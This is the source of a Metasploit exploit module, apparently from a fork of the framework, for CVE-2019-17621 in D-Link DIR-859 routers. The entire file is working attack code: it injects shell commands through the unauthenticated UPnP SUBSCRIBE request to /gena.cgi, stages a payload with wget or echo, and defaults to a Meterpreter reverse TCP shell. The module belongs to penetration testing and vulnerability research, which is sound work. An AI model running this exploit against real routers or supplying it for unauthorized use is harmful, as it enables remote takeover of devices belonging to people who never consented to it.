metasploit-gs/modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
        'Description' => %q{
          D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP
          interface. The vulnerability exists in /gena.cgi (function genacgi_main() in
          /htdocs/cgibin), which is accessible without credentials.
        },
        'Author' => [
          'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
          'Pablo Pollanco P.' # Vulnerability discovery and metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2019-17621' ],
          [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
        ],
        'DisclosureDate' => '2019-12-24',
        'Privileged' => true,
        'Platform' => 'linux',
        'Arch' => ARCH_MIPSBE,
        'DefaultOptions' => {
          'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget',
          'RPORT' => '49152'
        },
        'Targets' => [
          [ 'Automatic',	{} ],
        ],
        'CmdStagerFlavor' => %w[echo wget],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )
  end

  def execute_command(cmd, _opts)
    callback_uri = 'http://192.168.0.' + Rex::Text.rand_text_hex(2).to_i(16).to_s +
                   ':' + Rex::Text.rand_text_hex(4).to_i(16).to_s +
                   '/' + Rex::Text.rand_text_alpha(3..12)
    send_request_raw({
      'uri'	=> "/gena.cgi?service=`#{cmd}`",
      'method' =>	'SUBSCRIBE',
      'headers' =>
      {
        'Callback' => "<#{callback_uri}>",
        'NT' => 'upnp:event',
        'Timeout' => 'Second-1800'
      }
    })
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
  end

  def exploit
    execute_cmdstager(linemax: 500)
  end
end